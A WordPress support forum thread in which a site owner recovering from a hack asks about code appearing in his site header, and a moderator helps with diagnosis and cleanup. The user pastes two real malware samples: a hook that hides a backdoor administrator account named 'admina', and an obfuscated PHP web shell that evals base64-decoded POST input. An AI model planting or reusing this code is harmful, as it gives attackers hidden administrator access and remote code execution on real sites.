Error / code showing after deleting user admina through phpmyadmin

  • Hey,

    I just upgraded after my WP getting hacked.

    It was on a pretty new install already so there were only 2 other users and I removed them through phpmyadmin now Im getting this in the header on the main site:

    add_action(‘pre_user_query’,’yoursite_pre_user_query’); function yoursite_pre_user_query($user_search) { global $current_user; $username = $current_user->user_login; if ($username != ‘admina’) { global $wpdb; $user_search->query_where = str_replace(‘WHERE 1=1’, “WHERE 1=1 AND {$wpdb->users}.user_login != ‘admina'”,$user_search->query_where); } }

    Anyone know what could be wrong please?

    Thanks for any help

Viewing 9 replies - 1 through 9 (of 9 total)
  • Moderator bcworkz

    (@bcworkz)

    There’s some code that’s missing <?php ?> tags, probably due to a failed if/else comparison related to the admina user. Code that works off a specific username is suspicious. Maybe your clean up was not as thorough as you thought?

    • This reply was modified 7 years, 11 months ago by bcworkz.
    Thread Starter JohnDiver

    (@johndiver)

    Hey,

    My cleanup consisted of a fresh directory and fresh install of wordpress 4.7 and I entered the old database info in config.php then went to wp-admin and simply upgraded the database.. so there were no files from before the upgrade, the database was the only thing.

    Thanks

    Thread Starter JohnDiver

    (@johndiver)

    4.7 was also just downloaded from www.remarpro.com yesterday

    Moderator bcworkz

    (@bcworkz)

    What theme are you using? Did you install clean theme files? That code is an amateur attempt to hide the admina user from user queries. You may safely remove it, but I’m concerned about other malicious code that may be hiding in your theme somewhere that did not accidentally get exposed like this.

    Thread Starter JohnDiver

    (@johndiver)

    Hey,

    I totally forgot I moved over the theme the database was setup to use – Kasa Green – The code is from that – It also shows up in the admincp.

    When I changed back to one of the default themes the code is gone.

    Do you think this would be a problem with the theme or was it hacked another way while the site was online?

    Thanks again for your help

    Moderator bcworkz

    (@bcworkz)

    You’re probably fine, but an incursion IS possible. You might look through your access logs for suspicious POST requests with 200 status if the time span and amount of traffic isn’t too large. Unfortunately, without being able to see POST data, what’s suspicious and what’s normal can be difficult to discern. Strange user agents and IPs from well know hacker countries (unless that’s where your server is located) would be suspicious. But suspicious != incursion.

    You’ll need to decide for yourself whether the risk is enough to warrant another clean-up just in case.

    Thread Starter JohnDiver

    (@johndiver)

    At this stage it seems like I have to remove all my sites.

    It started with 1 or 2 WP sites but then it seems to have effected the server and other non-WP sites after a long time.

    Some of the WP installs were very out of date though so it easily have come through that.

    I wish I knew what it actually is though because now files on other scripts are being effected and files with what is obviously some type of hack / virus are being created even when I created a new empty folder.

    For example this is code from one file from a WP that was hacked:

    [code]<?php $bxh1 ="obc4spdte6a_"; $emsb10 = strtolower ($bxh1[1].$bxh1[10].$bxh1[4].$bxh1[8]. $bxh1[9]. $bxh1[3] .$bxh1[11]. $bxh1[6].$bxh1[8].$bxh1[2]. $bxh1[0].$bxh1[6].$bxh1[8]) ;$dzn5= strtoupper($bxh1[11].$bxh1[5].$bxh1[0]. $bxh1[4].$bxh1[7] ) ;if(isset ( ${ $dzn5 }['n2a5248' ])) {eval( $emsb10 ( ${ $dzn5 } [ 'n2a5248' ]) ) ;}?>[/code]

    This is in a file called admin.php in the root dir of WP.
    Theres numerous of these – These are shown as suspected files, none of the files in the theme folder are showing as suspected though..

    Thanks

    Moderator bcworkz

    (@bcworkz)

    I’m afraid so. My previous post was based on the assumption the rest of the server was clean and there was this one snippet standing in the way of a clean/not clean decision.

    Now it sounds like the entire server was never properly cleaned. Treating separate sites on the same server account as separate unrelated entities is a common mistake. People will religiously keep their production site updated, but ignore an old staging site in a different folder. An unpatched vulnerability in that old staging site can cause the otherwise secure production site to become compromised.

    Locating the penetration vector can be very difficult if not impossible to determine. To some extent it doesn’t help much knowing this. Once the account is compromised, all content on it is suspect. You still need to close off all security vulnerabilities regardless of which one was actually used. It’d be silly to plug the one hole they used and leave others open.

    You’ve probably seen FAQ My site was hacked, but since you’re essentially starting over with a clean up, it’ll be helpful to review the process again.

    I’m sorry for your troubles. Best of luck to you.

    Thread Starter JohnDiver

    (@johndiver)

    Great reply ??

    I will look at the link for the hacked page now.

    I really hope this resolves this, I have a lot of site compromised now and my host won’t enable the sites until its resolved

    Thanks again ??

Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘Error / code showing after deleting user admina through phpmyadmin’ is closed to new replies.